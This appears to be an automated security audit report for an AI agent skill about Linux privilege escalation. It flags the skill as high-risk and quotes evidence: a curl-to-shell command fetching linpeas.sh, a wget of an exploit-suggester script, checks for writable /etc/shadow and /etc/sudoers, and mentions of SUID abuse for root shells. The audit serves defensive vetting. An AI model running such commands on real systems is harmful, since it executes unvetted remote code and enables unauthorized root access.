skills/mukul975/anthropic-cybersecurity-skills/performing-privilege-escalation-on-linux/Gen Agent Trust Hub
performing-privilege-escalation-on-linux
Fail
Audited by Gen Agent Trust Hub on Apr 7, 2026
Risk Level: HIGHREMOTE_CODE_EXECUTIONCOMMAND_EXECUTIONDATA_EXFILTRATIONEXTERNAL_DOWNLOADS
Full Analysis
- [REMOTE_CODE_EXECUTION]: The
workflows.mdfile contains instructions for downloading and executing remote scripts in a single command pipeline (curl-to-shell), which is a high-risk pattern for arbitrary code execution. - Evidence:
curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | shinreferences/workflows.md. - [EXTERNAL_DOWNLOADS]: The skill facilitates the download and execution of multiple third-party tools from unverified GitHub repositories.
- Evidence:
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.shinreferences/workflows.md. - [DATA_EXFILTRATION]: The
scripts/agent.pyscript performs discovery of sensitive system files that are commonly targeted for credential harvesting or privilege escalation. - Evidence: The script checks for write access to
/etc/shadow,/etc/passwd, and/etc/sudoersin thecheck_writable_filesfunction. - [COMMAND_EXECUTION]: The
scripts/agent.pyscript uses thesubprocessmodule to execute a wide variety of system-level enumeration commands. - Evidence: Functions like
enumerate_system_info,check_sudo_permissions, andfind_suid_binariesexecute commands such asuname -a,sudo -l, andfind / -perm -4000. - [COMMAND_EXECUTION]: Documentation provides detailed workflows for escaping restricted environments and gaining root access by abusing system binaries and kernel vulnerabilities.
- Evidence: Examples for abusing SUID binaries like
findandpython3to spawn root shells are provided inreferences/workflows.md.
Recommendations
- AI detected serious security threats
Audit Metadata